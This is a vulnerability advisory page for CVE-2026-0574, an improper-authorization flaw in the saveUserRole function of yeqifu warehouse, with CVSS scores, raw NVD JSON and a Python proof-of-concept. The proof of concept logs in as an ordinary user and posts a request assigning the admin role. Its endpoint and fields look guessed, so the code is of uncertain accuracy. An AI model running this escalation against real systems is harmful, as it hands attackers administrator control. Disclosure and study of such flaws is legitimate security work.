Security Vulnerability Report
中文
CVE-2026-0574 CVSS 6.3 MEDIUM

CVE-2026-0574

Published: 2026-01-04 02:15:42
Last Modified: 2026-04-29 01:00:02
Source: [email protected]

Description

A weakness has been identified in yeqifu warehouse up to aaf29962ba407d22d991781de28796ee7b4670e4. This affects the function saveUserRole of the file warehouse\src\main\java\com\yeqifu\sys\controller\UserController.java of the component Request Handler. This manipulation causes improper authorization. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be used for attacks. This product adopts a rolling release strategy to maintain continuous delivery. Therefore, version details for affected or updated releases cannot be specified.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:yeqifu:warehouse:*:*:*:*:*:*:*:* - VULNERABLE
yeqifu warehouse < aaf29962ba407d22d991781de28796ee7b4670e4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2026-0574 PoC - Vertical Privilege Escalation in yeqifu warehouse # Target: yeqifu warehouse saveUserRole function TARGET_URL = "http://target.com/warehouse" TARGET_ENDPOINT = "/api/user/saveUserRole" # Normal user credentials (low privilege) NORMAL_USER = { "username": "regular_user", "password": "user_password" } def exploit_privilege_escalation(): """ Exploit the improper authorization vulnerability in saveUserRole function. This allows low-privilege users to escalate their privileges to administrator. """ # Step 1: Authenticate as normal user session = requests.Session() login_url = f"{TARGET_URL}/api/login" login_response = session.post(login_url, json=NORMAL_USER) if login_response.status_code != 200: print("[-] Authentication failed") return False print("[+] Successfully authenticated as low-privilege user") # Step 2: Exploit the privilege escalation vulnerability # The saveUserRole function does not properly validate authorization exploit_url = f"{TARGET_URL}{TARGET_ENDPOINT}" # Payload to escalate current user to admin role exploit_payload = { "userId": 1, # Target user ID (typically admin or self) "roleIds": [1], # Admin role ID "username": NORMAL_USER["username"] } exploit_response = session.post(exploit_url, json=exploit_payload) if exploit_response.status_code == 200: print("[+] Privilege escalation successful!") print("[+] User now has administrator privileges") return True else: print(f"[-] Exploitation failed with status code: {exploit_response.status_code}") return False if __name__ == "__main__": exploit_privilege_escalation()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0574", "sourceIdentifier": "[email protected]", "published": "2026-01-04T02:15:41.690", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in yeqifu warehouse up to aaf29962ba407d22d991781de28796ee7b4670e4. This affects the function saveUserRole of the file warehouse\\src\\main\\java\\com\\yeqifu\\sys\\controller\\UserController.java of the component Request Handler. This manipulation causes improper authorization. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be used for attacks. This product adopts a rolling release strategy to maintain continuous delivery. Therefore, version details for affected or updated releases cannot be specified."}, {"lang": "es", "value": "Se ha identificado una debilidad en el almacén yeqifu hasta aaf29962ba407d22d991781de28796ee7b4670e4. Esto afecta a la función saveUserRole del archivo warehouse\\src\\main\\java\\com\\yeqifu\\sys\\controller\\UserController.java del componente Request Handler. Esta manipulación causa una autorización impropia. El ataque es posible llevarlo a cabo remotamente. El exploit se ha puesto a disposición del público y podría usarse para ataques. Este producto adopta una estrategia de lanzamiento continuo para mantener la entrega continua. Por lo tanto, los detalles de la versión para las versiones afectadas o actualizadas no pueden especificarse."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-266"}, {"lang": "en", "value": "CWE-285"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:yeqifu:warehouse:*:*:*:*:*:*:*:*", "versionEndInclud ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.